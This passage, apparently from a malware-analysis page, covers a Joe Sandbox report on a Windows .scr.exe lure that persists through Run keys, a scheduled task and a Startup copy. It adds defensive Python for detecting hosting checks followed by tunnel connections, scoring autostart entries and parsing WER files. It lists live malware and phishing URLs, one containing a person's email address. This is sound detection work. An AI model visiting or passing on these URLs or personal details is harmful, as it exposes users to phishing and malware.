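        hits.append("playit_gg_tunnel_endpoint")
    return hits


def correlate(events, window=timedelta(seconds=120)):
    """Emit single-event alerts, plus a sequence alert when the same process
    performs the hosting check and then connects to a tunnel within `window`."""
    alerts = []
    last_check = {}  # pid -> time of its most recent hosting check
    for ev in sorted(events, key=lambda e: e["ts"]):
        hits = single_event_rules(ev)
        for rule in hits:
            alerts.append({"rule": rule, "pid": ev["pid"],
                           "host": ev["host"], "port": ev["port"]})
        if "ip_api_hosting_check" in hits:
            last_check[ev["pid"]] = ev["ts"]
        if ("playit_gg_tunnel_endpoint" in hits and ev["pid"] in last_check
                and ev["ts"] - last_check[ev["pid"]] <= window):
            alerts.append({"rule": "hosting_check_then_tunnel", "pid": ev["pid"],
                           "host": ev["host"], "port": ev["port"]})
    return alerts


def detect(text):
    """Parse and run all rules; returns the alert list in time order."""
    return correlate(parse_log(text))


if __name__ == "__main__":
    for a in detect(LOG):
        print(f"{a['rule']:<32} pid={a['pid']} {a['host']}:{a['port']}")
```

The sequence rule is the one that carries weight in production: ip-api.com and the Discord CDN each see plenty of legitimate traffic, but one process performing the hosting check and then opening a high-port connection to a tunnelling service within two minutes is the shape of this sample's first contact.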
                      Joe Sandbox Version:38.0.0 Ammolite
                      Analysis ID:1331098
                      Start date and time:2023-10-24 09:28:06 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
Sample file name:#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe (the sandbox escapes non-ASCII characters as #Uxxxx; decoded, the name is the Cyrillic провера_блокнота.scr.exe, roughly "notepad check", a lure name with a double .scr.exe extension)
                      renamed because original name is a hash value
                      Original Sample Name:_.scr.exe
                      Detection:MAL
                      Classification:mal100.adwa.evad.winEXE@10/11@3/3
                      EGA Information:
                      • Successful, ratio: 40%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 80
                      • Number of non-executed functions: 23
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7504 because it is empty
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7716 because it is empty
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7776 because it is empty
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
Behavior and APIs
Time | Type | Description
09:28:51 | API Interceptor | 95930x Sleep call for process: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe modified
09:28:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr
09:28:55 | Task Scheduler | Run new task: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ path: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
09:28:55 | API Interceptor | 1x Sleep call for process: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr modified
09:29:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
09:29:10 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr
09:29:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
09:29:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
09:30:05 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
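The timeline above records the same persistence target being registered three different ways within forty seconds: an HKCU Run value, a scheduled task and a Startup-folder copy, all launching .scr files under AppData\Roaming, plus a second Run value ("Stata") whose recorded path mimics the system binary name wininit. The following is an added example for this page, not code from Joe Sandbox or from the sample: it scores autostart entries for exactly that pattern. The entries are transcribed from the report's timeline (plus one benign control entry); the weights, the 4-point threshold and the case-transition heuristic for machine-generated names are this example's own assumptions.

```python
"""Score autostart entries for the persistence pattern seen in this report.
Entries are transcribed from the report timeline (plus one benign control);
weights, threshold and the random-name heuristic are assumptions."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class AutostartEvent:
    kind: str   # "run_key", "startup_folder" or "scheduled_task"
    name: str   # registry value name, task name or file name
    path: str   # command the entry launches


# Transcribed from the report's Behavior and APIs timeline; the last entry is
# a constructed benign control.
EVENTS = [
    AutostartEvent("run_key", "Stata",
        r"C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr"),
    AutostartEvent("scheduled_task", "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ",
        r"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr"),
    AutostartEvent("run_key", "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ",
        r"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr"),
    AutostartEvent("startup_folder", "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr",
        r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr"),
    AutostartEvent("run_key", "OneDrive",
        r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

# First token of a command line that ends in an executable-type extension
EXE_RE = re.compile(r'^"?(.+?\.(?:exe|scr|pif|com|cpl|bat|cmd|vbs|js|dll))(?:"|\s|$)', re.I)
SUSPICIOUS_EXT = {".scr", ".pif", ".com", ".cpl"}   # assumption: rarely legitimate in autostart
SYSTEM_NAMES = {"wininit", "svchost", "csrss", "lsass", "winlogon", "smss", "explorer", "conhost"}


def executable_of(command):
    """Strip arguments and quotes, returning the launched file's path."""
    m = EXE_RE.match(command)
    return m.group(1) if m else command


def looks_random(stem):
    """Heuristic (assumption): long names with many upper/lower case flips
    are machine-generated; 'OneDrive' has one flip, the dropped name has 15."""
    if len(stem) < 16:
        return False
    letters = [c for c in stem if c.isalpha()]
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips >= 6


def score_event(ev):
    """Return (score, reasons) for one autostart entry."""
    exe = executable_of(ev.path)
    stem, ext = ntpath.splitext(ntpath.basename(exe))
    score, reasons = 0, []
    if ext.lower() in SUSPICIOUS_EXT:
        score += 3
        reasons.append(f"autostart launches a {ext.lower()} file")
    if "\\appdata\\roaming\\" in exe.lower():
        score += 1
        reasons.append("target lives in the user-writable AppData\\Roaming tree")
    if looks_random(stem):
        score += 2
        reasons.append("file name looks machine-generated")
    # The 'Stata' value as recorded in the report has no separator before
    # wininit.scr ("...\1.0.0.0wininit.scr"), so the system name is matched as a
    # substring of the stem rather than as the whole stem.
    if any(n in stem.lower() for n in SYSTEM_NAMES) and not exe.lower().startswith("c:\\windows\\"):
        score += 3
        reasons.append("mimics a Windows system binary name outside C:\\Windows")
    return score, reasons


def triage(events, threshold=4):
    """Entries scoring at or above `threshold`, in input order."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({"kind": ev.kind, "name": ev.name, "path": ev.path,
                            "score": score, "reasons": reasons})
    return flagged


def redundancy(events):
    """Map each launched executable (lower-cased) to the set of mechanisms that
    register it; one file behind several mechanisms is itself a signal."""
    by_target = {}
    for ev in events:
        by_target.setdefault(executable_of(ev.path).lower(), set()).add(ev.kind)
    return by_target


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['score']:>2}  {f['kind']:<15} {f['name']}")
        print("    " + "; ".join(f["reasons"]))
    for target, kinds in redundancy(EVENTS).items():
        if len(kinds) > 1:
            print(f"{target} is registered via {sorted(kinds)}")
```

On a live host the same scoring can be fed from the HKCU and HKCU\Software\Classes\...\Wow6432Node Run keys, the user's Startup folder and the Task Scheduler action XML; the point of the redundancy map is that removing one mechanism (for example the task) leaves the Run value and the Startup copy in place, so all three have to be cleaned together.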
Joe Sandbox View / Context

IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1
Quotation.js | malicious | WSHRAT | ip-api.com/json/
Tax-Returns-Of-R58-765.js | malicious | WSHRAT | ip-api.com/json/
DRMS_Tender_No._P500-2023-102.exe | malicious | Predator | ip-api.com/json/
vZFGXiTg6o.exe | malicious | AsyncRAT, StormKitty, VenomRAT | ip-api.com/line/?fields=hosting
SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exe | malicious | Blackshades | ip-api.com/json/
xeC7cROikxmJ.exe | malicious | Quasar | ip-api.com/json/
Ref-231017AF-Payment-Details.js | malicious | AgentTesla, WSHRAT | ip-api.com/json/
New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.js | malicious | WSHRat, VjW0rm | ip-api.com/json/
WXzp6KMJ7i.exe | malicious | DCRat, Raccoon Stealer v2, RedLine | ip-api.com/line/?fields=hosting
Payment_Copy.docx.vbs | malicious | AgentTesla, WSHRAT | ip-api.com/json/
RYwCwF604X.vbs | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
W7z1Z5tra2.exe | malicious | RedLine, WSHRAT | ip-api.com/json/
J1LICQ1PqV.exe | malicious | Unknown | ip-api.com/line/?fields=hosting
Fekubiv.exe | malicious | Phemedrone Stealer | ip-api.com/json/?fields=11827
Fekubiv.exe | malicious | Phemedrone Stealer | ip-api.com/json/?fields=11827
2Elynyru.exe | malicious | Phemedrone Stealer | ip-api.com/json/?fields=11827
16970164832f46ccf1ed8cbfb3a428dcf1a37a26fdb5f110b9d4713c4435d7b67ec0a18b61185.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | ip-api.com/line/?fields=hosting
sample.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
file.exe | malicious | Unknown | ip-api.com/line/?fields=hosting
Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com
f557585868686689ax.htm | malicious | Unknown | 208.95.112.2
Quotation.js | malicious | WSHRAT | 208.95.112.1
Tax-Returns-Of-R58-765.js | malicious | WSHRAT | 208.95.112.1
DRMS_Tender_No._P500-2023-102.exe | malicious | Predator | 208.95.112.1
vZFGXiTg6o.exe | malicious | AsyncRAT, StormKitty, VenomRAT | 208.95.112.1
nej4vdHX1w.exe | malicious | Amadey, Glupteba, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader | 208.95.112.1
SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exe | malicious | Blackshades | 208.95.112.1
file.exe | malicious | Amadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader | 208.95.112.1
TSiDou7y4f.exe | malicious | Amadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader | 208.95.112.1
file.exe | malicious | Amadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader, Xmrig | 208.95.112.1
file.exe | malicious | Amadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader, Xmrig | 208.95.112.1
pdf-92837.xlsx | malicious | Unknown | 208.95.112.2
xeC7cROikxmJ.exe | malicious | Quasar | 208.95.112.1
Ref-231017AF-Payment-Details.js | malicious | AgentTesla, WSHRAT | 208.95.112.1
https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com%20https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com | malicious | HTMLPhisher | 208.95.112.2
New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.js | malicious | WSHRat, VjW0rm | 208.95.112.1
WXzp6KMJ7i.exe | malicious | DCRat, Raccoon Stealer v2, RedLine | 208.95.112.1
Payment_Copy.docx.vbs | malicious | AgentTesla, WSHRAT | 208.95.112.1
message.html | malicious | HTMLPhisher | 208.95.112.2
Gsk-Lux.html | malicious | HTMLPhisher | 208.95.112.2
cdn.discordapp.com
XJFQnTn3QU.exe | malicious | Unknown | 162.159.135.233
y4TF9DptOh.exe | malicious | Unknown | 162.159.129.233
XJFQnTn3QU.exe | malicious | Unknown | 162.159.133.233
y4TF9DptOh.exe | malicious | Unknown | 162.159.133.233
Draft_BL,_CI_&_PL.vbs | malicious | Remcos, GuLoader | 162.159.135.233
file.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoader | 162.159.129.233
file.exe | malicious | Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoader | 162.159.135.233
file.exe | malicious | RedLine, Xmrig | 162.159.133.233
file.exe | malicious | RedLine, Xmrig | 162.159.135.233
RFQ_____20.10.2023___jpeg_image.exe | malicious | Unknown | 162.159.130.233
RFQ_____20.10.2023___jpeg_image.exe | malicious | Unknown | 162.159.135.233
doc_253554_2023.vbs | malicious | GuLoader, Remcos | 162.159.130.233
out.js | malicious | Unknown | 162.159.134.233
out.js | malicious | Unknown | 162.159.133.233
RFQ-No._10-18-2023.vbs | malicious | Remcos, GuLoader | 162.159.135.233
shippingdocument.vbs | malicious | GuLoader, Remcos | 162.159.129.233
http://predimed.crm360.pt | malicious | Unknown | 162.159.134.233
PO.hta | malicious | AgentTesla | 162.159.135.233
file.exe | malicious | Amadey, Babuk, Clipboard Hijacker, CobaltStrike, Djvu, Glupteba, RedLine | 162.159.130.233
invoice.vbs | malicious | Remcos, GuLoader | 162.159.133.233
ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
https://gtzenterprises.com.np/inag/?67368931 | malicious | Unknown | 162.159.135.42
UNILEVER_PURCHASE_ORDER_#109332.xls | malicious | AgentTesla, zgRAT | 104.21.83.102
BLM_Inqury_PO009116420231024.xls | malicious | AgentTesla, zgRAT | 172.67.222.26
http://www.alsumooduae.com | malicious | Unknown | 104.17.25.14
file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader | 1.1.1.1
Sheet_2.A.doc | malicious | AgentTesla | 172.67.166.168
P.O_2.doc | malicious | FormBook | 172.67.132.61
PURCHASE_O_001.doc | malicious | FormBook | 104.21.4.159
Suntech_Inquiry_P43030.xls | malicious | FormBook | 104.21.88.28
Doc002355.xls | malicious | AgentTesla, zgRAT | 172.67.222.26
Bhl9bymdkI.exe | malicious | FormBook | 172.67.213.32
47rR4jIgtD.exe | malicious | Raccoon Stealer v2, zgRAT | 172.67.130.17
hwASvuKtNVNBQwu.exe | malicious | AgentTesla | 162.159.137.232
GCeHcfCef8.exe | malicious | FormBook | 104.19.157.23
New_Order_enquiry.xla.xlsx | malicious | AgentTesla, zgRAT | 172.67.215.45
Purchase_Order_022502_-_0002.xla.xlsx | malicious | AgentTesla, zgRAT | 104.21.45.138
file.exe | malicious | Djvu, Glupteba, RedLine, SmokeLoader, Xmrig | 172.67.139.220
REF_03351.doc | malicious | FormBook | 104.21.53.135
Purchase_Order_A7.pdf.exe | malicious | FormBook | 172.64.151.154
file.exe | malicious | FormBook | 23.227.38.74
COGECO-PEER1CA
Purchase_Order_A7.pdf.exe | malicious | FormBook | 162.254.39.20
https://%C4%BEa.eu/5UU | malicious | Unknown | 69.90.254.78
https://open.substack.com/pub/davidlebovitz/p/brittany-addresses?r=aq9on&utm_medium=ios&utm_campaign=post | malicious | HTMLPhisher | 69.90.254.78
https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://www.generation-nt.com/reponses/on-gnome-xfce-kde-bientot-nous-aurons-windows-entraide-3844211.html%3Fpage%3D2&ved=2ahUKEwin4OyqhYyCAxXzlWoFHdflDIsQFnoECAgQAQ&usg=AOvVaw0aU9VdyHXl9jH_yb4I9bI0 | malicious | Unknown | 69.90.254.78
5taQFPMw1K.elf | malicious | Mirai | 208.239.240.239
x607DB0i08.exe | malicious | Pushdo | 76.74.184.61
http://4576cjdgaj786eugtdeuatda.z6.web.core.windows.net | malicious | Unknown | 69.90.133.51
https://www.canva.com/design/DAFxlvBGr-o/diWl6nVbhBiveMVSeuUDpQ/view?utm_content=DAFxlvBGr-o&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 103.26.141.105
sora.arm7.elf | malicious | Mirai | 66.129.182.32
x86.elf | malicious | Mirai | 66.40.223.193
x86-20231015-1817.elf | malicious | Mirai | 216.65.83.162
https://8o88sfjx.page.link/29hQ | malicious | Unknown | 209.25.233.253
https://www.erhealthplans.com/RKduHZzY/d?url=pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZ#pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZMAYYY2hyaXN0aWUuYmFlejFAc3NzcHIuY29t | malicious | Unknown | 209.25.233.254
x7RlIzQDk1.exe | malicious | Unknown | 76.74.184.61
https://syswc3ar.page.link/jofZ | malicious | HTMLPhisher | 209.25.233.254
http://iplogger.com | malicious | HTMLPhisher | 209.25.233.254
https://rosmodem.wordpress.com | malicious | HTMLPhisher | 209.25.233.254
SecureMessage99331.htM | malicious | HTMLPhisher | 69.90.66.130
EwK95WVtzI.exe | malicious | Pushdo | 76.74.184.61
https://p.feedblitz.com/t3/882921/109614235/13473938/https://viewfromthewing.com/airbnb-guest-stayed-500-nights-and-demanded-100000-to-leave-because-california/ | malicious | Unknown | 69.90.133.51
TUT-ASUS
f557585868686689ax.htm | malicious | Unknown | 208.95.112.2
Quotation.js | malicious | WSHRAT | 208.95.112.1
Tax-Returns-Of-R58-765.js | malicious | WSHRAT | 208.95.112.1
DRMS_Tender_No._P500-2023-102.exe | malicious | Predator | 208.95.112.1
vZFGXiTg6o.exe | malicious | AsyncRAT, StormKitty, VenomRAT | 208.95.112.1
SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exe | malicious | Blackshades | 208.95.112.1
pdf-92837.xlsx | malicious | Unknown | 208.95.112.2
pdf-92837.xlsx | malicious | Unknown | 208.95.112.2
xeC7cROikxmJ.exe | malicious | Quasar | 208.95.112.1
Ref-231017AF-Payment-Details.js | malicious | AgentTesla, WSHRAT | 208.95.112.1
https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com%20https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com | malicious | HTMLPhisher | 208.95.112.2
New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.js | malicious | WSHRat, VjW0rm | 208.95.112.1
WXzp6KMJ7i.exe | malicious | DCRat, Raccoon Stealer v2, RedLine | 208.95.112.1
Payment_Copy.docx.vbs | malicious | AgentTesla, WSHRAT | 208.95.112.1
message.html | malicious | HTMLPhisher | 208.95.112.2
Gsk-Lux.html | malicious | HTMLPhisher | 208.95.112.2
RYwCwF604X.vbs | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 208.95.112.1
W7z1Z5tra2.exe | malicious | RedLine, WSHRAT | 208.95.112.1
J1LICQ1PqV.exe | malicious | Unknown | 208.95.112.1
JA3 Fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad
file.exe | malicious | XFiles Stealer | 162.159.135.233
AS9Dqsivqk.exe | malicious | Unknown | 162.159.135.233
AS9Dqsivqk.exe | malicious | Unknown | 162.159.135.233
Invoices.scr.exe | malicious | AveMaria | 162.159.135.233
ZuXcnAYgVp.exe | malicious | Njrat | 162.159.135.233
j6gr7r4Bj2.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
ERFrKcEtfs.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
zipsetup_(2).exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
ncYntjWJNr.exe | malicious | Njrat | 162.159.135.233
Okuru.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
ChromeNaverGameStarter_Installer.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
Dormitory_Hentai_Clicker-Final.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
WALLHACK_CRACK_Roblox_by_PREDATOR.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
FortniteHackiNJECTOR.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
Healthy_Hentai_Lifestyle_Installer.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
RYwCwF604X.vbs | malicious | PXRECVOWEIWOEI Stealer | 162.159.135.233
1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 162.159.135.233
https://docs.google.com/presentation/d/e/2PACX-1vTikKHOuCMRAQnyuWl6bkSnoWXxMBgQaYb36E7fDJr4AK0ZL-qckfBYFvBPAnCFm1lkRHLFNf4FyxqO/pub?start=false&loop=false&delayms=3000&slide=id.p | malicious | Unknown | 162.159.135.233
puttygen.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233
PUTTY_GEN.exe | malicious | Agent Tesla, AgentTesla | 162.159.135.233

Dropped Files
No context
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):1.3883972708288055
                      Encrypted:false
                      SSDEEP:384:9UzbY70IbZLZtcaO0opazuiFTY4IO8zGP:9UzbSbZLZtcaO1azuiFTY4IO8z
                      MD5:2AE2D62ED43C04F7A03FE78B482C9F03
                      SHA1:DF88BAEA674DFD0589F6A3198F832DE79D7B3544
                      SHA-256:57A79834FFAE7FA7E86F3978453ED96959D0B05D4E3528F2AE8A4D946A3ABF08
                      SHA-512:6A19CDFD08D6D4AC0ADF4C68D54B9F69E62F35329504152BCD909B247119DA0E6A1618CEF79D22DDF06D3BB2EC1E96438CB24FD9709233981D54525A30622760
                      Malicious:false
                      Reputation:low
Preview (UTF-16LE text with CRLF line terminators, decoded):
Version=1
EventType=BEX
EventTime=133426062020634012
ReportType=2
Consent=1
UploadTime=133426062029540315
ReportStatus=524384
ReportIdentifier=2c9cf18f-2e54-4dc7-937a-fa5452ea9a01
IntegratorReportIdentifier=0a0e2b59-4ab8-42f5-8611-2ad2960acee3
Wow64Host=34404
Wow64Guest=332
NsAppName=#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U0 (cut at 64 characters in the file)
OriginalFilename=worm.exe
AppSessionGuid=000019dc-0001-0014-53fb-d0bb4b06da01
TargetAppId=W:000679ff8fb1ecd67e1ba92cc44ab7c160990000000 (preview ends here)
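The WER report dropped by WerFault.exe is a plain UTF-16LE key=value file, and three of its fields are worth pulling out during triage: EventTime is a FILETIME that pins the crash to the second (it should agree with the minidump's own timestamp), Wow64Host/Wow64Guest carry IMAGE_FILE_MACHINE_* values that confirm a 32-bit process on a 64-bit host, and OriginalFilename is what the crashed binary's version resource calls itself (here worm.exe, not the Cyrillic lure name). The following is an added example for this page, not code from Joe Sandbox or from the sample; the bytes are constructed from the values in the preview above (with the NsAppName field written out in full) and are not the dropped file itself.

```python
"""Parse a Windows Error Reporting Report.wer file (UTF-16LE key=value text)
and extract triage facts. SAMPLE_WER is constructed from the values shown in
the report preview; it is not the dropped file."""
import re
from datetime import datetime, timedelta, timezone

# Constructed from the preview; NsAppName written out in full here.
SAMPLE_WER_LINES = [
    "Version=1",
    "EventType=BEX",
    "EventTime=133426062020634012",
    "ReportType=2",
    "Consent=1",
    "UploadTime=133426062029540315",
    "ReportStatus=524384",
    "ReportIdentifier=2c9cf18f-2e54-4dc7-937a-fa5452ea9a01",
    "IntegratorReportIdentifier=0a0e2b59-4ab8-42f5-8611-2ad2960acee3",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe",
    "OriginalFilename=worm.exe",
    "AppSessionGuid=000019dc-0001-0014-53fb-d0bb4b06da01",
]
# Constructed file image: BOM, then UTF-16LE text with CRLF terminators, as WER writes it.
SAMPLE_WER = (b"\xff\xfe" + "\r\n".join(SAMPLE_WER_LINES).encode("utf-16-le")
              + "\r\n".encode("utf-16-le"))

# IMAGE_FILE_MACHINE_* constants from the PE specification
MACHINE_TYPES = {0x14C: "I386", 0x8664: "AMD64", 0xAA64: "ARM64"}


def parse_wer(data: bytes) -> dict:
    """Decode the file and return its key=value pairs (first '=' splits)."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    fields = {}
    for line in data.decode("utf-16-le").splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            fields[key] = value
    return fields


def filetime_to_utc(value: str) -> datetime:
    """WER EventTime/UploadTime are FILETIMEs: 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=int(value) // 10)


def unescape_joe_name(name: str) -> str:
    """Joe Sandbox writes non-ASCII file-name characters as #Uxxxx; undo that."""
    return re.sub(r"#U([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), name)


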